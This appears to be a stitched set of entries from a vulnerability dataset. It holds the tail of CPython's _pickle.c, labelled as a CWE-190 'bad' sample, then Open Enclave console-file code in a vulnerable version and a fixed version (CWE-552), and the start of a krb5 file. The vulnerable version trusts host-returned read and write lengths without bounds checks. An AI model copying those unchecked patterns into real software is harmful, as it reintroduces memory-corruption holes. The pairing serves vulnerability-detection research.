encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the pickle data stored in a file.
This is equivalent to ``Unpickler(file).load()``, but may be more
efficient.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
The argument *file* must have two methods, a read() method that takes
an integer argument, and a readline() method that requires no
arguments. Both methods should return bytes. Thus *file* can be a
binary file object opened for reading, an io.BytesIO object, or any
other custom object that meets this interface.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle stream
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_load_impl(PyObject *module, PyObject *file, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=69e298160285199e input=01b44dd3fc07afa7]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetInputStream(unpickler, file) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
/*[clinic input]
_pickle.loads
data: object
*
fix_imports: bool = True
encoding: str = 'ASCII'
errors: str = 'strict'
Read and return an object from the given pickle data.
The protocol version of the pickle is detected automatically, so no
protocol argument is needed. Bytes past the pickled object's
representation are ignored.
Optional keyword arguments are *fix_imports*, *encoding* and *errors*,
which are used to control compatibility support for pickle stream
generated by Python 2. If *fix_imports* is True, pickle will try to
map the old Python 2 names to the new names used in Python 3. The
*encoding* and *errors* tell pickle how to decode 8-bit string
instances pickled by Python 2; these default to 'ASCII' and 'strict',
respectively. The *encoding* can be 'bytes' to read these 8-bit
string instances as bytes objects.
[clinic start generated code]*/
static PyObject *
_pickle_loads_impl(PyObject *module, PyObject *data, int fix_imports,
const char *encoding, const char *errors)
/*[clinic end generated code: output=1e7cb2343f2c440f input=70605948a719feb9]*/
{
PyObject *result;
UnpicklerObject *unpickler = _Unpickler_New();
if (unpickler == NULL)
return NULL;
if (_Unpickler_SetStringInput(unpickler, data) < 0)
goto error;
if (_Unpickler_SetInputEncoding(unpickler, encoding, errors) < 0)
goto error;
unpickler->fix_imports = fix_imports;
result = load(unpickler);
Py_DECREF(unpickler);
return result;
error:
Py_XDECREF(unpickler);
return NULL;
}
static struct PyMethodDef pickle_methods[] = {
_PICKLE_DUMP_METHODDEF
_PICKLE_DUMPS_METHODDEF
_PICKLE_LOAD_METHODDEF
_PICKLE_LOADS_METHODDEF
{NULL, NULL} /* sentinel */
};
static int
pickle_clear(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
return 0;
}
static void
pickle_free(PyObject *m)
{
_Pickle_ClearState(_Pickle_GetState(m));
}
static int
pickle_traverse(PyObject *m, visitproc visit, void *arg)
{
PickleState *st = _Pickle_GetState(m);
Py_VISIT(st->PickleError);
Py_VISIT(st->PicklingError);
Py_VISIT(st->UnpicklingError);
Py_VISIT(st->dispatch_table);
Py_VISIT(st->extension_registry);
Py_VISIT(st->extension_cache);
Py_VISIT(st->inverted_registry);
Py_VISIT(st->name_mapping_2to3);
Py_VISIT(st->import_mapping_2to3);
Py_VISIT(st->name_mapping_3to2);
Py_VISIT(st->import_mapping_3to2);
Py_VISIT(st->codecs_encode);
Py_VISIT(st->getattr);
return 0;
}
static struct PyModuleDef _picklemodule = {
PyModuleDef_HEAD_INIT,
"_pickle", /* m_name */
pickle_module_doc, /* m_doc */
sizeof(PickleState), /* m_size */
pickle_methods, /* m_methods */
NULL, /* m_reload */
pickle_traverse, /* m_traverse */
pickle_clear, /* m_clear */
(freefunc)pickle_free /* m_free */
};
PyMODINIT_FUNC
PyInit__pickle(void)
{
PyObject *m;
PickleState *st;
m = PyState_FindModule(&_picklemodule);
if (m) {
Py_INCREF(m);
return m;
}
if (PyType_Ready(&Unpickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pickler_Type) < 0)
return NULL;
if (PyType_Ready(&Pdata_Type) < 0)
return NULL;
if (PyType_Ready(&PicklerMemoProxyType) < 0)
return NULL;
if (PyType_Ready(&UnpicklerMemoProxyType) < 0)
return NULL;
/* Create the module and add the functions. */
m = PyModule_Create(&_picklemodule);
if (m == NULL)
return NULL;
Py_INCREF(&Pickler_Type);
if (PyModule_AddObject(m, "Pickler", (PyObject *)&Pickler_Type) < 0)
return NULL;
Py_INCREF(&Unpickler_Type);
if (PyModule_AddObject(m, "Unpickler", (PyObject *)&Unpickler_Type) < 0)
return NULL;
st = _Pickle_GetState(m);
/* Initialize the exceptions. */
st->PickleError = PyErr_NewException("_pickle.PickleError", NULL, NULL);
if (st->PickleError == NULL)
return NULL;
st->PicklingError = \
PyErr_NewException("_pickle.PicklingError", st->PickleError, NULL);
if (st->PicklingError == NULL)
return NULL;
st->UnpicklingError = \
PyErr_NewException("_pickle.UnpicklingError", st->PickleError, NULL);
if (st->UnpicklingError == NULL)
return NULL;
Py_INCREF(st->PickleError);
if (PyModule_AddObject(m, "PickleError", st->PickleError) < 0)
return NULL;
Py_INCREF(st->PicklingError);
if (PyModule_AddObject(m, "PicklingError", st->PicklingError) < 0)
return NULL;
Py_INCREF(st->UnpicklingError);
if (PyModule_AddObject(m, "UnpicklingError", st->UnpicklingError) < 0)
return NULL;
if (_Pickle_InitState(st) < 0)
return NULL;
return m;
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_496_0 |
crossvul-cpp_data_bad_4170_4 | // Copyright (c) Open Enclave SDK contributors.
// Licensed under the MIT License.
#include <openenclave/enclave.h>
#include <openenclave/corelibc/stdio.h>
#include <openenclave/corelibc/stdlib.h>
#include <openenclave/corelibc/string.h>
#include <openenclave/internal/print.h>
#include <openenclave/internal/syscall/fcntl.h>
#include <openenclave/internal/syscall/fd.h>
#include <openenclave/internal/syscall/fdtable.h>
#include <openenclave/internal/syscall/iov.h>
#include <openenclave/internal/syscall/raise.h>
#include <openenclave/internal/syscall/sys/ioctl.h>
#include <openenclave/internal/syscall/unistd.h>
#include <openenclave/internal/thread.h>
#include <openenclave/internal/trace.h>
#include "syscall_t.h"
#define MAGIC 0x0b292bab
typedef struct _file
{
oe_fd_t base;
uint32_t magic;
oe_host_fd_t host_fd;
} file_t;
static oe_file_ops_t _get_ops(void);
static file_t* _cast_file(const oe_fd_t* file_)
{
file_t* file = (file_t*)file_;
if (file == NULL || file->magic != MAGIC)
return NULL;
return file;
}
static int _consolefs_dup(oe_fd_t* file_, oe_fd_t** new_file_out)
{
int ret = -1;
file_t* file = _cast_file(file_);
file_t* new_file = NULL;
if (new_file_out)
*new_file_out = NULL;
if (!file || !new_file_out)
OE_RAISE_ERRNO(OE_EINVAL);
/* Allocate and initialize a new file structure. */
{
if (!(new_file = oe_calloc(1, sizeof(file_t))))
OE_RAISE_ERRNO(OE_ENOMEM);
new_file->base.type = OE_FD_TYPE_FILE;
new_file->base.ops.file = _get_ops();
new_file->magic = MAGIC;
}
/* Ask the host to perform this operation. */
{
oe_host_fd_t retval = -1;
if (oe_syscall_dup_ocall(&retval, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (retval == -1)
OE_RAISE_ERRNO(oe_errno);
new_file->host_fd = retval;
}
*new_file_out = (oe_fd_t*)new_file;
ret = 0;
new_file = NULL;
done:
if (new_file)
oe_free(new_file);
return ret;
}
static int _consolefs_ioctl(oe_fd_t* file_, unsigned long request, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* MUSL uses the TIOCGWINSZ ioctl request to determine whether the file
* descriptor refers to a terminal device (such as stdin, stdout, and
* stderr) so that it can use line-bufferred input and output. This check
* fails when delegated to the host since this implementation opens the
* devices by name (/dev/stdin, /dev/stderr, /dev/stdout). So the following
* block works around this problem by implementing TIOCGWINSZ on the
* enclave side. Other terminal control ioctls are left unimplemented.
*/
if (request == OE_TIOCGWINSZ)
{
struct winsize
{
unsigned short int ws_row;
unsigned short int ws_col;
unsigned short int ws_xpixel;
unsigned short int ws_ypixel;
};
struct winsize* p;
if (!(p = (struct winsize*)arg))
OE_RAISE_ERRNO(OE_EINVAL);
p->ws_row = 24;
p->ws_col = 80;
p->ws_xpixel = 0;
p->ws_ypixel = 0;
ret = 0;
goto done;
}
if (oe_syscall_ioctl_ocall(&ret, file->host_fd, request, arg, 0, NULL) !=
OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static int _consolefs_fcntl(oe_fd_t* file_, int cmd, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
void* argout = NULL;
uint64_t argsize = 0;
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
switch (cmd)
{
case OE_F_GETFD:
case OE_F_SETFD:
case OE_F_GETFL:
case OE_F_SETFL:
break;
case OE_F_GETLK:
case OE_F_OFD_GETLK:
argsize = sizeof(struct oe_flock);
argout = (void*)arg;
break;
case OE_F_SETLKW:
case OE_F_SETLK:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
case OE_F_OFD_SETLK:
case OE_F_OFD_SETLKW:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
// for sockets
default:
case OE_F_DUPFD:
case OE_F_SETOWN:
case OE_F_GETOWN:
case OE_F_SETSIG:
case OE_F_GETSIG:
case OE_F_SETOWN_EX:
case OE_F_GETOWN_EX:
case OE_F_GETOWNER_UIDS:
OE_RAISE_ERRNO(OE_EINVAL);
}
if (oe_syscall_fcntl_ocall(
&ret, file->host_fd, cmd, arg, argsize, argout) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_read(oe_fd_t* file_, void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_read_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_write(oe_fd_t* file_, const void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_write_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_readv(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
if (!file || !iov || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/* Call the host. */
if (oe_syscall_readv_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
/* Synchronize data read with IO vector. */
if (oe_iov_sync(iov, iovcnt, buf, buf_size) != 0)
OE_RAISE_ERRNO(OE_EINVAL);
done:
if (buf)
oe_free(buf);
return ret;
}
static ssize_t _consolefs_writev(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
if (!file || (!iov && iovcnt) || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/* Call the host. */
if (oe_syscall_writev_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
if (buf)
oe_free(buf);
return ret;
}
static oe_host_fd_t _consolefs_gethostfd(oe_fd_t* file_)
{
oe_host_fd_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
ret = file->host_fd;
done:
return ret;
}
static oe_off_t _consolefs_lseek(oe_fd_t* file_, oe_off_t offset, int whence)
{
oe_off_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(offset);
OE_UNUSED(whence);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pread(
oe_fd_t* file_,
void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pwrite(
oe_fd_t* file_,
const void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static int _consolefs_close(oe_fd_t* file_)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/* Ask the host to perform this operation. */
{
if (oe_syscall_close_ocall(&ret, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (ret == -1)
OE_RAISE_ERRNO(oe_errno);
}
/* Free the file structure. */
oe_free(file);
done:
return ret;
}
static int _consolefs_getdents64(
oe_fd_t* file,
struct oe_dirent* dirp,
uint32_t count)
{
OE_UNUSED(file);
OE_UNUSED(dirp);
OE_UNUSED(count);
/* The standard devices are not directories, so this is unsupported. */
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fstat(oe_fd_t* file, struct oe_stat_t* buf)
{
OE_UNUSED(file);
OE_UNUSED(buf);
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fsync(oe_fd_t* file)
{
OE_UNUSED(file);
OE_RAISE_ERRNO(OE_EINVAL);
done:
return -1;
}
static oe_file_ops_t _ops = {
.fd.read = _consolefs_read,
.fd.write = _consolefs_write,
.fd.readv = _consolefs_readv,
.fd.writev = _consolefs_writev,
.fd.dup = _consolefs_dup,
.fd.ioctl = _consolefs_ioctl,
.fd.fcntl = _consolefs_fcntl,
.fd.close = _consolefs_close,
.fd.get_host_fd = _consolefs_gethostfd,
.lseek = _consolefs_lseek,
.pread = _consolefs_pread,
.pwrite = _consolefs_pwrite,
.getdents64 = _consolefs_getdents64,
.fstat = _consolefs_fstat,
.fsync = _consolefs_fsync,
.fdatasync = _consolefs_fsync,
};
static oe_file_ops_t _get_ops(void)
{
return _ops;
}
static oe_fd_t* _new_file(uint32_t fileno)
{
oe_fd_t* ret = NULL;
file_t* file = NULL;
if (fileno > OE_STDERR_FILENO)
goto done;
/* Create the file struct. */
{
if (!(file = oe_calloc(1, sizeof(file_t))))
goto done;
file->base.type = OE_FD_TYPE_FILE;
file->base.ops.file = _ops;
file->magic = MAGIC;
}
/* Ask the host to duplicate the file descriptor. */
{
oe_host_fd_t retval;
if (oe_syscall_dup_ocall(&retval, fileno) != OE_OK)
goto done;
if (retval < 0)
goto done;
file->host_fd = retval;
}
ret = &file->base;
file = NULL;
done:
if (file)
oe_free(file);
return ret;
}
oe_fd_t* oe_consolefs_create_file(uint32_t fileno)
{
switch (fileno)
{
case OE_STDIN_FILENO:
return _new_file(OE_STDIN_FILENO);
case OE_STDOUT_FILENO:
return _new_file(OE_STDOUT_FILENO);
case OE_STDERR_FILENO:
return _new_file(OE_STDERR_FILENO);
default:
return NULL;
}
}
| ./CrossVul/dataset_final_sorted/CWE-552/c/bad_4170_4 |
crossvul-cpp_data_good_4170_4 | // Copyright (c) Open Enclave SDK contributors.
// Licensed under the MIT License.
#include <openenclave/enclave.h>
#include <openenclave/corelibc/stdio.h>
#include <openenclave/corelibc/stdlib.h>
#include <openenclave/corelibc/string.h>
#include <openenclave/internal/print.h>
#include <openenclave/internal/syscall/fcntl.h>
#include <openenclave/internal/syscall/fd.h>
#include <openenclave/internal/syscall/fdtable.h>
#include <openenclave/internal/syscall/iov.h>
#include <openenclave/internal/syscall/raise.h>
#include <openenclave/internal/syscall/sys/ioctl.h>
#include <openenclave/internal/syscall/unistd.h>
#include <openenclave/internal/thread.h>
#include <openenclave/internal/trace.h>
#include "syscall_t.h"
#define MAGIC 0x0b292bab
typedef struct _file
{
oe_fd_t base;
uint32_t magic;
oe_host_fd_t host_fd;
} file_t;
static oe_file_ops_t _get_ops(void);
static file_t* _cast_file(const oe_fd_t* file_)
{
file_t* file = (file_t*)file_;
if (file == NULL || file->magic != MAGIC)
return NULL;
return file;
}
static int _consolefs_dup(oe_fd_t* file_, oe_fd_t** new_file_out)
{
int ret = -1;
file_t* file = _cast_file(file_);
file_t* new_file = NULL;
if (new_file_out)
*new_file_out = NULL;
if (!file || !new_file_out)
OE_RAISE_ERRNO(OE_EINVAL);
/* Allocate and initialize a new file structure. */
{
if (!(new_file = oe_calloc(1, sizeof(file_t))))
OE_RAISE_ERRNO(OE_ENOMEM);
new_file->base.type = OE_FD_TYPE_FILE;
new_file->base.ops.file = _get_ops();
new_file->magic = MAGIC;
}
/* Ask the host to perform this operation. */
{
oe_host_fd_t retval = -1;
if (oe_syscall_dup_ocall(&retval, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (retval == -1)
OE_RAISE_ERRNO(oe_errno);
new_file->host_fd = retval;
}
*new_file_out = (oe_fd_t*)new_file;
ret = 0;
new_file = NULL;
done:
if (new_file)
oe_free(new_file);
return ret;
}
static int _consolefs_ioctl(oe_fd_t* file_, unsigned long request, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* MUSL uses the TIOCGWINSZ ioctl request to determine whether the file
* descriptor refers to a terminal device (such as stdin, stdout, and
* stderr) so that it can use line-bufferred input and output. This check
* fails when delegated to the host since this implementation opens the
* devices by name (/dev/stdin, /dev/stderr, /dev/stdout). So the following
* block works around this problem by implementing TIOCGWINSZ on the
* enclave side. Other terminal control ioctls are left unimplemented.
*/
if (request == OE_TIOCGWINSZ)
{
struct winsize
{
unsigned short int ws_row;
unsigned short int ws_col;
unsigned short int ws_xpixel;
unsigned short int ws_ypixel;
};
struct winsize* p;
if (!(p = (struct winsize*)arg))
OE_RAISE_ERRNO(OE_EINVAL);
p->ws_row = 24;
p->ws_col = 80;
p->ws_xpixel = 0;
p->ws_ypixel = 0;
ret = 0;
goto done;
}
if (oe_syscall_ioctl_ocall(&ret, file->host_fd, request, arg, 0, NULL) !=
OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static int _consolefs_fcntl(oe_fd_t* file_, int cmd, uint64_t arg)
{
int ret = -1;
file_t* file = _cast_file(file_);
void* argout = NULL;
uint64_t argsize = 0;
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
switch (cmd)
{
case OE_F_GETFD:
case OE_F_SETFD:
case OE_F_GETFL:
case OE_F_SETFL:
break;
case OE_F_GETLK:
case OE_F_OFD_GETLK:
argsize = sizeof(struct oe_flock);
argout = (void*)arg;
break;
case OE_F_SETLKW:
case OE_F_SETLK:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
case OE_F_OFD_SETLK:
case OE_F_OFD_SETLKW:
{
void* srcp = (void*)arg;
argsize = sizeof(struct oe_flock64);
argout = (void*)arg;
memcpy(argout, srcp, argsize);
break;
}
// for sockets
default:
case OE_F_DUPFD:
case OE_F_SETOWN:
case OE_F_GETOWN:
case OE_F_SETSIG:
case OE_F_GETSIG:
case OE_F_SETOWN_EX:
case OE_F_GETOWN_EX:
case OE_F_GETOWNER_UIDS:
OE_RAISE_ERRNO(OE_EINVAL);
}
if (oe_syscall_fcntl_ocall(
&ret, file->host_fd, cmd, arg, argsize, argout) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
done:
return ret;
}
static ssize_t _consolefs_read(oe_fd_t* file_, void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
/*
* According to the POSIX specification, when the count is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/read.html for
* for more detail.
*/
if (!file || count > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_read_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed count.
*/
if (ret > (ssize_t)count)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
return ret;
}
static ssize_t _consolefs_write(oe_fd_t* file_, const void* buf, size_t count)
{
ssize_t ret = -1;
file_t* file = _cast_file(file_);
/*
* According to the POSIX specification, when the count is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/write.html for
* for more detail.
*/
if (!file || count > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
if (oe_syscall_write_ocall(&ret, file->host_fd, buf, count) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed count.
*/
if (ret > (ssize_t)count)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
return ret;
}
static ssize_t _consolefs_readv(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
size_t data_size = 0;
if (!file || !iov || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size, &data_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/*
* According to the POSIX specification, when the data_size is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/readv.html for
* for more detail.
*/
if (data_size > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Call the host. */
if (oe_syscall_readv_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed data_size.
*/
if (ret > (ssize_t)data_size)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
/* Synchronize data read with IO vector. */
if (oe_iov_sync(iov, iovcnt, buf, buf_size) != 0)
OE_RAISE_ERRNO(OE_EINVAL);
done:
if (buf)
oe_free(buf);
return ret;
}
static ssize_t _consolefs_writev(
oe_fd_t* desc,
const struct oe_iovec* iov,
int iovcnt)
{
ssize_t ret = -1;
file_t* file = _cast_file(desc);
void* buf = NULL;
size_t buf_size = 0;
size_t data_size = 0;
if (!file || (!iov && iovcnt) || iovcnt < 0 || iovcnt > OE_IOV_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Flatten the IO vector into contiguous heap memory. */
if (oe_iov_pack(iov, iovcnt, &buf, &buf_size, &data_size) != 0)
OE_RAISE_ERRNO(OE_ENOMEM);
/*
* According to the POSIX specification, when the data_size is greater
* than SSIZE_MAX, the result is implementation-defined. OE raises an
* error in this case.
* Refer to
* https://pubs.opengroup.org/onlinepubs/9699919799/functions/writev.html
* for more detail.
*/
if (data_size > OE_SSIZE_MAX)
OE_RAISE_ERRNO(OE_EINVAL);
/* Call the host. */
if (oe_syscall_writev_ocall(&ret, file->host_fd, buf, iovcnt, buf_size) !=
OE_OK)
{
OE_RAISE_ERRNO(OE_EINVAL);
}
/*
* Guard the special case that a host sets an arbitrarily large value.
* The returned value should not exceed data_size.
*/
if (ret > (ssize_t)data_size)
{
ret = -1;
OE_RAISE_ERRNO(OE_EINVAL);
}
done:
if (buf)
oe_free(buf);
return ret;
}
static oe_host_fd_t _consolefs_gethostfd(oe_fd_t* file_)
{
oe_host_fd_t ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
ret = file->host_fd;
done:
return ret;
}
static oe_off_t _consolefs_lseek(oe_fd_t* file_, oe_off_t offset, int whence)
{
oe_off_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(offset);
OE_UNUSED(whence);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pread(
oe_fd_t* file_,
void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static ssize_t _consolefs_pwrite(
oe_fd_t* file_,
const void* buf,
size_t count,
oe_off_t offset)
{
ssize_t ret = -1;
OE_UNUSED(file_);
OE_UNUSED(buf);
OE_UNUSED(count);
OE_UNUSED(offset);
OE_RAISE_ERRNO(OE_ESPIPE);
done:
return ret;
}
static int _consolefs_close(oe_fd_t* file_)
{
int ret = -1;
file_t* file = _cast_file(file_);
if (!file)
OE_RAISE_ERRNO(OE_EINVAL);
/* Ask the host to perform this operation. */
{
if (oe_syscall_close_ocall(&ret, file->host_fd) != OE_OK)
OE_RAISE_ERRNO(OE_EINVAL);
if (ret == -1)
OE_RAISE_ERRNO(oe_errno);
}
/* Free the file structure. */
oe_free(file);
done:
return ret;
}
static int _consolefs_getdents64(
oe_fd_t* file,
struct oe_dirent* dirp,
uint32_t count)
{
OE_UNUSED(file);
OE_UNUSED(dirp);
OE_UNUSED(count);
/* The standard devices are not directories, so this is unsupported. */
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fstat(oe_fd_t* file, struct oe_stat_t* buf)
{
OE_UNUSED(file);
OE_UNUSED(buf);
OE_RAISE_ERRNO(OE_ENOTSUP);
done:
return -1;
}
static int _consolefs_fsync(oe_fd_t* file)
{
OE_UNUSED(file);
OE_RAISE_ERRNO(OE_EINVAL);
done:
return -1;
}
static oe_file_ops_t _ops = {
.fd.read = _consolefs_read,
.fd.write = _consolefs_write,
.fd.readv = _consolefs_readv,
.fd.writev = _consolefs_writev,
.fd.dup = _consolefs_dup,
.fd.ioctl = _consolefs_ioctl,
.fd.fcntl = _consolefs_fcntl,
.fd.close = _consolefs_close,
.fd.get_host_fd = _consolefs_gethostfd,
.lseek = _consolefs_lseek,
.pread = _consolefs_pread,
.pwrite = _consolefs_pwrite,
.getdents64 = _consolefs_getdents64,
.fstat = _consolefs_fstat,
.fsync = _consolefs_fsync,
.fdatasync = _consolefs_fsync,
};
static oe_file_ops_t _get_ops(void)
{
return _ops;
}
static oe_fd_t* _new_file(uint32_t fileno)
{
oe_fd_t* ret = NULL;
file_t* file = NULL;
if (fileno > OE_STDERR_FILENO)
goto done;
/* Create the file struct. */
{
if (!(file = oe_calloc(1, sizeof(file_t))))
goto done;
file->base.type = OE_FD_TYPE_FILE;
file->base.ops.file = _ops;
file->magic = MAGIC;
}
/* Ask the host to duplicate the file descriptor. */
{
oe_host_fd_t retval;
if (oe_syscall_dup_ocall(&retval, fileno) != OE_OK)
goto done;
if (retval < 0)
goto done;
file->host_fd = retval;
}
ret = &file->base;
file = NULL;
done:
if (file)
oe_free(file);
return ret;
}
oe_fd_t* oe_consolefs_create_file(uint32_t fileno)
{
switch (fileno)
{
case OE_STDIN_FILENO:
return _new_file(OE_STDIN_FILENO);
case OE_STDOUT_FILENO:
return _new_file(OE_STDOUT_FILENO);
case OE_STDERR_FILENO:
return _new_file(OE_STDERR_FILENO);
default:
return NULL;
}
}
| ./CrossVul/dataset_final_sorted/CWE-552/c/good_4170_4 |
crossvul-cpp_data_good_1535_1 | /* -*- mode: c; c-basic-offset: 4; indent-tabs-mode: nil -*- */
/*
* Copyright 1993 by OpenVision Technologies, Inc.
*
* Permission to use, copy, modify, distribute, and sell this software
* and its documentation for any purpose is hereby granted without fee,
* provided that the above copyright notice appears in all copies and
* that both that copyright notice and this permission notice appear in
* supporting documentation, and that the name of OpenVision not be used
* in advertising or publicity pertaining to distribution of the software
* without specific, written prior permission. OpenVision makes no
* representations about the suitability of this software for any
* purpose. It is provided "as is" without express or implied warranty.
*
* OPENVISION DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS SOFTWARE,
* INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS, IN NO
* EVENT SHALL OPENVISION BE LIABLE FOR ANY SPECIAL, INDIRECT OR
* CONSEQUENTIAL DAMAGES OR ANY DAMAGES WHATSOEVER RESULTING FROM LOSS OF
* USE, DATA OR PROFITS, WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR
* OTHER TORTIOUS ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
* PERFORMANCE OF THIS SOFTWARE.
*/
/*
* Copyright (C) 1998 by the FundsXpress, INC.
*
* All rights reserved.
*
